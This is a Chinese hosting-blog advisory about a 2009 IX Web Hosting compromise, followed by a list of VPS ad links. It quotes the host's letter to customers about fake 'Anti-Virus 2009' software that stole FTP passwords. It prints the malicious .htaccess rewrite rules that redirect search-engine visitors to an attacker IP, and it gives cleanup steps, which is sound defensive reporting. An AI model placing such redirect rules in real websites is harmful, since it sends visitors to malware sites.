关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 疯狂猜成语 图猜成语一个人在举重旁边一个人在搬东西周围是问号是什么成语?全球[VPS测评]
- 真实测评 CombCloud 香港沙田 CN2- 4H4G 80GSSD香港VPS[主机]
- 超优惠 磐石云元旦特惠→1 核 2G 内存 50G 硬盘 2G 防御 三全球[VPS测评]
- HostPapa→.com 域名 首年 0.99 美金 每账户限 5 个全球[VPS测评]
- Nodecache→CDN 服务 支持按流量付费和购买流量包 500GB全球[VPS测评]
- Kuai Che Dao→$35.6 半年 512MB 内存 10GB 虚拟空间(主机)
- 四五互联→宿迁移动高防服务器 首月 99 元 年付 999 元全球[VPS测评]
- Scarlet Cloud→流量转发服务 有枣庄联通 绍兴电信 杭州联通全球[VPS测评]
- php 多个数组根据指定键值分组方法全球[VPS测评]
- CloudCone→$2.49 月 768MB 内存 10GB SAS 虚拟空间(主机)
- 搬瓦工最便宜的美国 cn2vps 补货 Zenlayer CN2 线路 美国VPS[主机]
- 优惠 Digitalvm→日本机房 10G 带宽超多流量 国内连接速度超日本VPS[主机]
- Amazon CloudFront→香港 日本 韩国 台湾等 CDN 服日本VPS[主机]
- 死海网络互联洛杉矶 gia 特价重整上线,电信单线双程 GIA 联通移动全球[VPS测评]
- 什么是阿里云 ECS 服务器全球[VPS测评]
- cloudserver → 1$ 月 美国洛杉矶 纽约 1C2G40G硬美国VPS[主机]
- AlphaVPS 1核心 1G内存 512G HDD 1.5T流量 1G全球[VPS测评]
- 百家云服务器怎么样?免备案香港云服务器、即开即用香港VPS[主机]
- 跨境电商平台首选香港服务器香港VPS[主机]
- 世界杯季疫情突发,跨境电商订单排队,义乌商人面临难题全球[VPS测评]
- sugarhosts首推DECADE云服务器,香港云服务器,1核512M香港VPS[主机]
- 阿里云香港服务器价格优惠:老用户香港2核4G3M云服务器仅1181.5元香港VPS[主机]
- 又一跨境电商产业园落户!中山石岐签约引进16个项目全球[VPS测评]
- 香港云服务器对于建站有什么便捷的地方?香港VPS[主机]
- CMIVPS,香港vps终身八折$7.76/月起,1核1G内存,香港沙田香港VPS[主机]
- 青果云怎么样?美国/香港/日本云主机 买多久送多久日本VPS[主机]
- 金斗云双12活动:全场8折起,美国圣何塞CN2 GIA高防VPS20元/美国VPS[主机]
- RAKsmart促销活动:韩国服务器低价抢购,美国G口服务器低至$99,韩国VPS[主机]
- 瓜云互联:香港CN2/美国洛杉矶高防vps优惠促销,预充款最高送300元美国VPS[主机]
- 向日葵-漏洞科普:海外云服务器三种漏洞修复方法快收藏起来!全球[VPS测评]
转载请注明原文地址:http://140.238.13.167:12355/read-96245.html











